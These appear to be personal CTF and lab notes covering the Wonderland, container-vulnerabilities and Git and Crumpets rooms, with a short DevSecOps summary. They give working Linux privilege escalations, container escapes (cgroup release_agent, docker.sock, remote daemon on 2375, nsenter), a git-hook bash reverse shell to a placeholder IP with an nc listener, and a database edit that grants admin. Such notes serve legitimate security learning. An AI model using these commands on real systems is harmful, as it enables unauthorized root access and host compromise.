INDEX
2024-01-01 01:47 - Wonderland
Just going to write any novel issues I encounter.
Gobuster - found /r - eventually /r/a/b/b/i/t
Looking in the source of the page, there is what looks like login credentials in a hidden element:
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
Usual thing you check is what the user can run as sudo. In this case, a specific python script as another user:
sudo -l
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py  # File is not editable
For some reason the key to this is to look in /root/user.txt
Ah so apparently with the way it imports "random" you can override it and run your own script. Python puts the directory of the script being run first on sys.path, so a random.py placed next to the script in /home/alice (which alice can write to) shadows the standard library module and runs as rabbit:
# /home/alice/random.py
import os
os.system("/bin/bash")
This file has some strange permissions - setuid/setgid bits, root-owned - so it runs with elevated privileges, and it calls date without a full path, so change what date resolves to:
-rwsr-sr-x 1 root root 17K May 25 2020 teaParty
# Inside this file
/bin/echo -n 'Probably by ' && date --date='next hour' -R
So you put your own date earlier on PATH and run the binary normally:
export PATH=/tmp:$PATH
echo -e "#!/bin/bash\n/bin/bash" > /tmp/date
chmod +x /tmp/date  # Needed, or the fake date is not executable
./teaParty  # Now you are "hatter"
For some reason the next step gives the solution. Don't know enough about getcap to see why but apparently it's part of "PayloadAllTheThings":
getcap -r / 2>/dev/null  # Lists binaries carrying file capabilities; the perl one-liner below only works if perl shows up here with cap_setuid, which lets it call setuid(0) without being root
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
whoami  # should be root now
Seems kind of a dumb room but that's enough info to be valuable.
2024-02-02 11:36 - Container Vulnerabilities
If the hostname is a hash-like string it's likely a docker container (docker uses the 12-character short container ID as the hostname) - it will be minimal but may have key info.
Look for mismanaged containers, vulnerable images, exposed networking and hardcoded passwords.
Containers run either with docker's default restricted capability set or in privileged mode (--privileged keeps all capabilities and host device access, bypassing most of the isolation the docker engine normally enforces).
capsh --print  # (libcap2-bin) shows which capabilities the container holds
# Mount Exploit (cgroup v1 release_agent - needs CAP_SYS_ADMIN, i.e. a privileged container)
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x  # Mount the cgroup management files to a local folder and create a child cgroup "x"
echo 1 > /tmp/cgrp/x/notify_on_release  # Tell the kernel to run the release_agent once the cgroup is "finished" (has no processes left)
## Set host_path to where the container's files are stored on the host (the overlay upperdir taken from the mount table), since the kernel runs the agent from the host's view of the filesystem
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit" > /tmp/cgrp/release_agent  # Save the filename to be run, as a host path
echo '#!/bin/sh ...' > /exploit; chmod a+x /exploit  # Save arbitrary shell command to run (as root, on the host)
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"  # Put a short-lived process in the cgroup; when it exits the cgroup empties and the host runs /exploit
Docker socket: the daemon listens on a unix socket owned by root:docker, so any user in the docker group can start arbitrary containers, which is effectively root on the host.
ls -la /var/run | grep sock  # find "docker.sock"
docker run -v /:/mnt --rm -it alpine chroot /mnt sh  # Mount the host filesystem inside a container and chroot into it
By default, a remotely accessible docker daemon listens on TCP port 2375 with no authentication or TLS.
nmap -sV -p 2375 IP  # Check if remote access is enabled
curl http://IP:2375/version  # Interact with the API using curl
docker -H tcp://IP:2375 COMMAND  # Run arbitrary docker commands on the remote daemon
If a container shares a namespace with the host (e.g. started with --pid=host) it can be exploited:
ps aux  # Check if host processes are visible
nsenter --target 1 --mount --uts --ipc --net /bin/bash  # Enter the namespaces of PID 1 (the host's init); also needs CAP_SYS_ADMIN
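Added here as a worked example, not part of the original notes: a small POSIX sh triage script that checks the two things the notes above rely on before you try any escape. It tests whether the hostname looks like a docker short container ID, and it decodes the CapEff hex mask from /proc/self/status to see whether CAP_SYS_ADMIN (capability number 21 in linux/capability.h) is present, which the release_agent and nsenter techniques need. The sample status text is constructed; 00000000a80425fb is docker's default capability set for an unprivileged container.

```shell
#!/bin/sh
# Added example: triage whether we are in a docker container and whether the
# cgroup release_agent / nsenter escapes are even possible from here.

# Docker sets the container hostname to its 12-character short ID (lowercase hex).
# Returns 0 if the name looks like one, 1 otherwise.
looks_like_container_id() {
    case "$1" in
        ????????????) ;;                        # exactly 12 characters
        *) return 1 ;;
    esac
    case "$1" in
        *[!0123456789abcdef]*) return 1 ;;      # any non-hex character disqualifies it
    esac
    return 0
}

# Extract the effective capability mask from /proc/<pid>/status text.
# Usage: capeff_of "$(cat /proc/self/status)"
capeff_of() {
    printf '%s\n' "$1" | sed -n 's/^CapEff:[[:space:]]*//p'
}

# Test whether capability number $2 is set in the hex mask $1.
# Capability numbers come from <linux/capability.h>; CAP_SYS_ADMIN is 21.
CAP_SYS_ADMIN=21
has_cap() {
    mask=$1
    bit=$2
    [ $(( (0x$mask >> $bit) & 1 )) -eq 1 ]
}

# One-line verdict tying the mask back to the escapes in these notes.
escape_verdict() {
    if has_cap "$1" "$CAP_SYS_ADMIN"; then
        echo "cap_sys_admin present: release_agent / nsenter escapes worth trying"
    else
        echo "cap_sys_admin absent: look for docker.sock or tcp/2375 instead"
    fi
}

# Constructed sample of an unprivileged docker container's /proc/self/status;
# 00000000a80425fb is docker's default capability set (no CAP_SYS_ADMIN).
SAMPLE_STATUS=$(printf 'Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n')

# When run directly on a box, check the real hostname and capability mask.
if [ -r /proc/self/status ]; then
    looks_like_container_id "$(cat /proc/sys/kernel/hostname 2>/dev/null)" && echo "hostname looks like a docker container ID"
    escape_verdict "$(capeff_of "$(cat /proc/self/status)")"
fi
```

Run it as the first thing after landing in a shell: if CAP_SYS_ADMIN is absent the cgroup mount in the notes will fail with EPERM, so skip straight to looking for a mounted docker.sock or an exposed 2375 port.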
2024-02-02 12:20 - Intro to DevSecOps
Shifting left = moving security and testing to earlier stages of the pipeline rather than doing them only at the end.
DevSecOps = DevOps + shifting left.
Main challenges: a siloed security team, lack of visibility and complex environments.
Teams must be autonomous, which means automating the key pipeline processes.
All services must support monitoring - visible security checks and testing.
2024-02-02 15:45 - Git and Crumpets
Get a server with 80 exposed, curl it - "haven't sorted dns yet" clue = add to /etc/hosts
echo "IP git.git-and-crumpets.thm" >> /etc/hosts  # Then open http://git.git-and-crumpets.thm
# gitea instance - make account - look at repos - commit history - comments in commits
# Says the password is stored in the avatar image
Had to install steghide from the AUR:
makepkg -si  # Download the PKGBUILD file then build and install it
# Essentially installs with pacman so can uninstall with that too
# Installed "yay" so now further packages are easier to install
yay steghide
Actually looks like the password is stored as text in the image:
strings FILENAME  # Literally "SCONES:Password"
# Go on the repo - add a git hook that spawns a reverse shell:
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
nc -lnvp PORT  # Run the reverse shell listener on the local machine first
python3 -c "import pty; pty.spawn('/bin/bash')"  # Upgrade to a proper tty
# Look in random folders - /home/git - find file - base64 decode
cat /home/git/user.txt | base64 -d
Gitea has been the main focus so look at its data files - /var/lib/gitea/data
sqlite3 /var/lib/gitea/data/gitea.db
.tables  # List all tables - if this fails, do ".exit" and reopen
SELECT * FROM user;
UPDATE user SET is_admin=1 WHERE id=3;  # Then log in as user 3 - should have admin access